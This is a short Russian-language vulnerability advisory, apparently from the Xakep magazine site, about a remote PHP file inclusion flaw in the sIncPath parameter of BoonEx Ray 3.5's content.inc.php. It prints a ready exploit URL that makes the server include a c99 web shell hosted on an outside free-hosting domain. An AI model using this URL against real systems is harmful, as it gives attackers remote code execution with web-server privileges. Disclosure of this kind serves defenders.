PHP-инклюдинг в BoonEx Ray

Рекомендуем почитать:

Xakep #286. Sad Guard

Содержание выпуска
Подписка на «Хакер»-60%

Программа: BoonEx Ray 3.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «sIncPath» сценарием content.inc.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php? sIncPath=http://rxh.freehostia.com/shells/c99in.txt?

PHP-инклюдинг в BoonEx Ray

Xakep #286. Sad Guard

Последние взломы

HTB Extension. Пентестим плагин для Gitea и сбегаем из Docker

Опасный модем. Закрепляемся в атакованной системе при помощи USB-модема

Поставщик небезопасности. Как Windows раскрывает пароль пользователя

HTB Mentor. Извлекаем информацию из SNMP и пентестим API веб-сервиса

Компьютерные трюки

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Linux на диете. Уменьшаем требования Bodhi Linux к оперативной памяти

Как писать статьи. Колонка главреда

Свежие новости

BreachForums закрылся. Администрация опасается, что к серверам получили доступ правоохранители

На прошлой неделе ЦБ зафиксировал повышенное число кибератак на банки

Пользователи ChatGPT пожаловались, что видят истории чатов других людей

Ferrari сообщила об утечке данных. У компании требуют выкуп

Производитель криптобанкоматов General Bytes взломан, похищено 1,5 млн долларов